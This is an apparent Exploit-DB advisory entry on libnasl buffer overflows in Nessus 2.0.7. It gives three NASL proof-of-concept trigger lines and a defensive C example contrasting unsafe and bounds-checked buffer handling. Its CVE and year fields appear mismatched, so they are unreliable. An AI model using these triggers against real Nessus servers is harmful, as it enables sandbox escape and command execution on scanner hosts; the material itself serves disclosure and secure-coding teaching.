vendor: Nessus
by: SecurityFocus
CVSS: 8.8 (HIGH)
Buffer Overflow in libnasl
CWE: 119
Product Name: Nessus
Affected Version From: Nessus 2.0.7
Affected Version To: Nessus 2.0.7
Patch Exists: YES
Related CVE: CVE-2002-1337
CPE: a:nessus:nessus
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2002

Buffer Overflow in libnasl

A malicious NASL script can break out of the sandbox the NASL interpreter is meant to enforce and execute arbitrary commands on the scanner host. This is possible because of buffer overflows in the 'libnasl' library that Nessus uses to run plugins. The malicious script must be uploaded to the Nessus server as a plugin, which requires that the affected Nessus installation has the 'plugins_upload' option enabled (it is disabled by default).

Mitigation:

Disable the 'plugins_upload' option in the Nessus application.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7664/info

Nessus has reported that various flaws have been discovered in the 'libnasl' library used by the Nessus application. As a result, a malicious NASL script may be able to break outside of the established sandbox environment and execute arbitrary commands on the local system.

Note that this malicious script must be a legitimate plugin that has been uploaded to the Nessus server. Furthermore, the affected Nessus application must have enabled the 'plugins_upload' option (which is disabled by default).

# Each statement below is a stand-alone trigger; any one of them, run as an
# uploaded NASL plugin, reaches a libnasl routine that trusts script-supplied
# data. The values are the original proof-of-concept values.
# Trigger 1: the end index 0xfffffffd is -3 as a signed int; insstr() feeds it
# into its length arithmetic without a range check.
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
# Trigger 2: a 300-byte protocol name copied into a fixed-size buffer.
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
# Trigger 3: an 8192-byte user name overflows the fixed-size buffer
# ftp_log_in() builds its FTP commands in.
ftp_log_in (socket : open_sock_tcp(21), pass : "11", user:crap (data:'A',length:8192) );
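The three trigger lines above each hand script-controlled data to a C routine in libnasl that trusts it: an end index of 0xfffffffd (-3 as a signed int) to insstr, a 300-byte protocol name to scanner_add_port, and an 8192-byte user name to ftp_log_in. The C program below is an added example, not code from Nessus or libnasl; its function names, buffer sizes and the inclusive-end-index semantics it assumes for insstr are choices made for illustration. It puts the unsafe fixed-buffer pattern next to a bounds-checked version that refuses oversized input instead of overflowing or silently truncating, and shows the index validation an interpreter should perform before an insstr-style operation on a script-supplied range.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Added illustration, not Nessus/libnasl code. It models the two defect
 * classes behind the proof-of-concept lines on this page: a script-controlled
 * string copied into a fixed-size C buffer, and a script-controlled index pair
 * used in arithmetic without range validation. Names and sizes are assumptions.
 */

#define FTP_CMD_BUF 256   /* assumed size of the command buffer */

/* Unsafe pattern (what the 8192-byte 'user' trigger relies on): the length of
 * 'user' is never compared with the destination buffer. Only ever called here
 * with a short, known-safe input. */
static void build_user_cmd_unsafe(char *buf, const char *user)
{
    sprintf(buf, "USER %s\r\n", user);   /* overflows 'buf' when 'user' is long */
}

/* Hardened form: the buffer size is part of the contract and the function
 * refuses input that would not fit. Returns the command length, or -1. */
static int build_user_cmd_safe(char *buf, size_t buflen, const char *user)
{
    size_t need = strlen("USER ") + strlen(user) + strlen("\r\n") + 1;
    if (need > buflen)
        return -1;
    int n = snprintf(buf, buflen, "USER %s\r\n", user);
    return (n < 0 || (size_t)n >= buflen) ? -1 : n;
}

/* Reproduces the page's ftp_log_in trigger (8192 x 'A', constructed here)
 * against the safe builder; the caller expects -1. */
static int safe_rejects_8192_user(void)
{
    char buf[FTP_CMD_BUF];
    char *huge = malloc(8193);
    if (!huge)
        return -2;
    memset(huge, 'A', 8192);
    huge[8192] = '\0';
    int rc = build_user_cmd_safe(buf, sizeof buf, huge);
    free(huge);
    return rc;
}

/* Range check an insstr(s, r, start, end)-style routine needs when the
 * interpreter passes it script-supplied integers. NASL ints are signed, so
 * 0xfffffffd arrives as -3: reject negatives, out-of-range values and
 * end < start up front rather than doing length arithmetic on them. */
static int insstr_range_ok(size_t slen, long start, long end)
{
    if (start < 0 || end < 0)
        return 0;
    if ((size_t)start >= slen || (size_t)end >= slen)
        return 0;
    if (end < start)
        return 0;
    return 1;
}

/* Checked replacement of s[start..end] (end inclusive, an assumption here)
 * by r, written into out. Returns the result length, or -1 on a bad range
 * or an output buffer that is too small. */
static int insstr_safe(char *out, size_t outlen, const char *s, const char *r,
                       long start, long end)
{
    size_t slen = strlen(s);
    if (!insstr_range_ok(slen, start, end))
        return -1;
    size_t tail = slen - (size_t)end - 1;
    size_t need = (size_t)start + strlen(r) + tail + 1;
    if (need > outlen)
        return -1;
    memcpy(out, s, (size_t)start);
    memcpy(out + start, r, strlen(r));
    memcpy(out + start + strlen(r), s + end + 1, tail);
    out[need - 1] = '\0';
    return (int)(need - 1);
}

int main(void)
{
    char buf[FTP_CMD_BUF];
    char out[64];

    build_user_cmd_unsafe(buf, "anonymous");   /* fine only because the input is short */
    printf("unsafe, short user : %s", buf);
    printf("safe, short user   : %d\n", build_user_cmd_safe(buf, sizeof buf, "anonymous"));
    printf("safe, 8192-byte user: %d\n", safe_rejects_8192_user());
    printf("insstr end=-3       : %d\n", insstr_safe(out, sizeof out, "aaaaaaaaaaa", "bb", 3, -3));
    printf("insstr end=5        : %d -> %s\n",
           insstr_safe(out, sizeof out, "aaaaaaaaaaa", "bb", 3, 5), out);
    return 0;
}
```

The point of returning -1 rather than truncating is that a script feeding in an 8192-byte user name is a script error, not a value to be quietly clipped; the interpreter should surface it as a NASL error and stop the plugin, which is what keeps the sandbox boundary meaningful.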